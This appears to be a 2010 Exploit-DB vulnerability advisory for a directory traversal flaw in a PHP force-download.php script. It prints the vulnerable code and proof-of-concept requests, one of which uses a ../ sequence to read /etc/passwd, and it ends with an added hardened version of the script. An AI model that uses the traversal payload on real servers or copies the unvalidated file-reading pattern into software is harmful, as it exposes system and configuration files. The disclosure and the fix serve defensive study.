Directory traversal (Unix) Vulnerability

EDB-ID: 13700
CVE: N/A
Platform: Unix
Published: 2010-05-13

0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
             .__       .___.__                       _____      _____  .__  .__         .__     
  __________ |  |    __| _/|__| ___________    _____/ ____\    /  _  \ |  | |  | _____  |  |__  
 /  ___/  _ \|  |   / __ | |  |/ __ \_  __ \  /  _ \   __\    /  /_\  \|  | |  | \__  \ |  |  \ 
 \___ (  <_> )  |__/ /_/ | |  \  ___/|  | \/ (  <_> )  |     /    |    \  |_|  |__/ __ \|   Y  \
/____  >____/|____/\____ | |__|\___  >__|     \____/|__|    /\____|__  /____/____(____  /___|  /
     \/                 \/         \/                       \/       \/               \/     \/ 
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
[o] Directory traversal (Unix) Vulnerability
*************************************************************************
[=========================================================================================================]
|                                         -== A U T H O R ==-                                             |
[=========================================================================================================]
  [+] Author    : Neo|g4br1eL
  [+] Contact   : gabriel_666[at]rocketmail[dot]com
  [+] Team      : Soldier.of.Allah
  [+] Site      : http://neogabriel.soldiersofallah.org/ 
                  http://systems-gabriel.isgreat.org/
[=========================================================================================================]
|                                     -== D E S C R I P T I O N ==-                                       |
[=========================================================================================================]
 Directory Traversal is a vulnerability which allows attackers to access restricted directories
 and execute commands outside of the web server's root directory. This vulnerability is similar to
 Local File Inclusion, and it can be found through the Remote File Disclosure technique
 (affects /force-download.php).
 ------------------------------------------------------------->>
 By exploiting directory traversal vulnerabilities, attackers step out of the root directory and access
 files in other directories. As a result, attackers might view restricted files or execute commands,
 leading to a full compromise of the Web server.
[=========================================================================================================]
|                                 -==  P r o o f  O f  C o n c e p t  ==-                                 |
[=========================================================================================================]
 As we know, the Remote File Disclosure vulnerability is found in force-download.php:
 --------------------------------------------
 <?php
    header("Content-type: application/force-download");
    header("Content-disposition: attachment; filename=".$_GET['gabriel']);
    echo file_get_contents($_GET['gabriel']);
 ?>
 --------------------------------------------
 which makes it possible to >>
 Request: http://127.0.0.1/force-download.php?gabriel=[files]
      http://127.0.0.1/force-download.php?gabriel=index.php
      http://127.0.0.1/force-download.php?gabriel=config.php
 --------------------------------------------
 <?php
     // Vulnerable: the request parameter is appended to the document root without validation
     $file = $_SERVER["DOCUMENT_ROOT"] . $_REQUEST['gabriel'];
     header("Pragma: public");
     header("Expires: 0");
     header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
     header("Content-Type: application/force-download");
     header("Content-Disposition: attachment; filename=" . basename($file));
     //header("Content-Description: File Transfer");
     @readfile($file);
     exit(0);
 ?>
 --------------------------------------------
 Request: http://127.0.0.1/force-download.php?gabriel=../../../../../../etc/passwd
 --------------------------------------------
 w00ps!! We can successfully read the "etc/passwd" file. Look at $_REQUEST['gabriel']; and
 @readfile($file); in the source code: because of those statements, we can see
 the content of an arbitrary file ^_^ (as with a Local File Inclusion vulnerability).
[=========================================================================================================]
|                                    -==  H o w   t o   F i x  ==-                                        |
[=========================================================================================================]
  Do not allow special characters in variables
  and do not allow direct downloads . . .
  or close your site before it gets pwned! LoL :D
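
  One way to implement the fix above, as an added example that is not the advisory author's code: a hardened force-download.php that canonicalizes the requested path and serves it only if it stays inside a download directory. The "/downloads" directory and the resolve_download() helper are assumptions made for illustration.

```php
<?php
// Hardened force-download.php (added example). Assumes downloadable files live
// in a dedicated "downloads" directory under the document root (hypothetical name).
declare(strict_types=1);

const DOWNLOAD_DIR = '/downloads'; // hypothetical, relative to DOCUMENT_ROOT

function resolve_download(string $baseDir, string $requested): ?string
{
    // Reject empty names and NUL bytes before touching the filesystem.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses "../" sequences and follows symlinks, so the check
    // below is made on the path that would actually be opened.
    $target = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // Containment check: the canonical path must sit below the base directory.
    // The trailing separator stops "/downloads-old" from matching "/downloads".
    if (strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $target;
}

$requested = $_GET['gabriel'] ?? '';
$path = resolve_download(
    $_SERVER['DOCUMENT_ROOT'] . DOWNLOAD_DIR,
    is_string($requested) ? $requested : ''   // array parameters are rejected
);
if ($path === null) {
    http_response_code(404);
    exit;
}
// Build the header from the resolved file name, never from the raw parameter,
// and strip quotes and CR/LF so the name cannot inject extra headers.
$name = preg_replace('/[^A-Za-z0-9._-]/', '_', basename($path));
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . $name . '"');
header('X-Content-Type-Options: nosniff');
header('Content-Length: ' . (string) filesize($path));
readfile($path);
```

  With this check, the ../../../../../../etc/passwd request from the proof of concept resolves to a path outside the download directory and gets a 404, and index.php or config.php in the document root are no longer reachable either.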
[=========================================================================================================]
|                                          -== N o t e 's ==-                                             |
[=========================================================================================================]
 Special Thanks    => Kalashnikov, g0nzhack, kamtiez, vyc0d, Fribo, Ichito Bandito, DeXteR, Don Tukulesto, 
           eLV1N4, Yadoy666, CS-31, PhiLe, r1pp3r_m4y4, Remick, Triple Zix, My22n, Setan_Muda, 
           xyberbreaker, V4mp, Zee Eichel, cr4wl3r, MyWisdom, z0mb1e, dhika81, and all who care to me :) 
 More Big Thanks to => Solder.of.Allah, Indonesiancoder, Indonesianhacker, Yogyacarderlink, Tecon-crew, 
           Undercyber, MC_Crew, Server.is.Down, Devilzc0de, ../../../etc (LoL)
[=========================================================================================================]
|                                            -== F I N ==-                                                |
[=========================================================================================================]